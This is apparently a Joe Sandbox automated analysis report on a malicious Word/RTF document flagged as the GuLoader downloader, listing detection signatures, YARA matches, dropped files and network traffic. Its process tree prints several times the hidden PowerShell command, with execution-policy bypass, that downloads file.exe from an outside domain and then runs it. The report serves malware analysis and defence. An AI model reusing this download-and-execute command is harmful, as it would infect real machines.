Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEPO0015922.doc

Overview

General Information

Sample Name:TEPO0015922.doc
Analysis ID:829399
MD5:364dc6c0e8a18b796aa535516d04cb53
SHA1:da1e74c37691d9fd57eb2e73ef89b3aacbaa23d2
SHA256:dd6f2ad2370d52c77db8f3659c116f15c1897e2528694fe9f046be45928a2608
Tags:doc
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Yara detected GuLoader
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
PE file contains more sections than normal
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1404 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 1204 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 264 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1820 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 2460 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • cmd.exe (PID: 2840 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1568 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2668 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 1452 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • cmd.exe (PID: 1320 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1832 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1668 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 2708 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • verclsid.exe (PID: 1808 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 280 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
TEPO0015922.docSUSP_INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.ditekSHen
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
TEPO0015922.docINDICATOR_RTF_Exploit_Scriptingdetects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.ditekSHen
  • 0xf3f9:$clsid2: 0003000000000000C000000000000046
  • 0xeb57:$ole6: D0Cf11E
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
  • 0xcad:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34
TEPO0015922.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\file.exeSUSP_NullSoftInst_Combo_Oct20_1Detects suspicious NullSoft Installer combination with common Copyright stringsFlorian Roth (Nextron Systems)
  • 0x18c08:$a1: NullsoftInst
  • 0x183d0:$b1: Microsoft Corporation
  • 0x1841c:$b1: Microsoft Corporation
  • 0x18500:$b1: Microsoft Corporation
  • 0x18584:$b1: Microsoft Corporation
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exeSUSP_NullSoftInst_Combo_Oct20_1Detects suspicious NullSoft Installer combination with common Copyright stringsFlorian Roth (Nextron Systems)
  • 0x18c08:$a1: NullsoftInst
  • 0x183d0:$b1: Microsoft Corporation
  • 0x1841c:$b1: Microsoft Corporation
  • 0x18500:$b1: Microsoft Corporation
  • 0x18584:$b1: Microsoft Corporation

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth (Nextron Systems)
  • 0xa9fc:$s3: System.Net.WebClient).DownloadFile('httP
0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth (Nextron Systems)
  • 0xa9bb:$sb1: -W Hidden
  • 0xa9ab:$sc1: -NoP
  • 0xa9b5:$sd1: -NonI
  • 0xa9c5:$se3: -ExecutionPolicy bypass
  • 0xa9b0:$sf1: -sta
00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth (Nextron Systems)
  • 0x91a:$s3: System.Net.WebClient).DownloadFile('httP
00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth (Nextron Systems)
  • 0x329c:$s3: System.Net.WebClient).DownloadFile('httP
00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth (Nextron Systems)
  • 0x26d0:$sb1: -W Hidden
  • 0x2880:$sb1: -W Hidden
  • 0x325b:$sb1: -W Hidden
  • 0x26b0:$sc1: -NoP
  • 0x2860:$sc1: -NoP
  • 0x324b:$sc1: -NoP
  • 0x26c4:$sd1: -NonI
  • 0x2874:$sd1: -NonI
  • 0x3255:$sd1: -NonI
  • 0x26e4:$se3: -ExecutionPolicy bypass
  • 0x2894:$se3: -ExecutionPolicy bypass
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x26ba:$sf1: -sta
  • 0x286a:$sf1: -sta
  • 0x3250:$sf1: -sta
Click to see the 16 entries

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: TEPO0015922.docReversingLabs: Detection: 23%
Source: TEPO0015922.docVirustotal: Detection: 42%Perma Link
Source: unknownHTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb8t source: powershell.exe, 00000012.00000002.958909440.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B54000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004065CE FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004027AA FindFirstFileA,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004065CE FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004027AA FindFirstFileA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: file[1].exe.0.drJump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
Source: global trafficDNS query: name: thekaribacruisecompany.com
Source: global trafficDNS query: name: thekaribacruisecompany.com
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
